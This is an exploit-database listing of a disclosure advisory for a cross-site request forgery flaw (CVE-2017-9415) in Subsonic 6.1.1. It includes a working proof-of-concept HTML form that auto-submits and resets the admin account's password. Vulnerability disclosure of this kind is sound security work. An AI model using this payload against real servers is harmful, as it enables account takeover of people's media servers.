Lucene search
Hyp3rlinx1337DAY-ID-27890HistoryJun 05, 2017 - 12:00 a.m.
Subsonic 6.1.1 - Cross-Site Request Forgery Vulnerability
2017-06-0500:00:00
hyp3rlinx
0day.today
20
EPSS
0.001
Percentile
48.2%
Exploit for windows platform in category web applications
[+] Credits: John Page a.k.a hyp3rlinx
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
=====================
CSRF - Password Reset
CVE Reference:
==============
CVE-2017-9415
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, username must be known or guessed.
Exploit/POC:
=============
<form action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username" value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input name="password" type="hidden" value="xyz123"/>
<input name="confirmPassword" type="hidden" value="xyz123"/>
<input name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>
# 0day.today [2018-01-10] #Related
prion
prion
Cross site request forgery (csrf)
2017-07-21 14:29:00
exploitpack
exploitpack
Subsonic 6.1.1 - Cross-Site Request Forgery
2017-06-05 00:00:00
cvelist
cvelist
CVE-2017-9415
2017-07-21 14:00:00
nvd
nvd
CVE-2017-9415
2017-07-21 14:29:01
cve
cve
CVE-2017-9415
2017-07-21 14:29:01
packetstorm
packetstorm
Subsonic 6.1.1 Password Reset Cross Site Request Forgery
2017-06-03 00:00:00
exploitdb
exploitdb
Subsonic 6.1.1 - Cross-Site Request Forgery
2017-06-05 00:00:00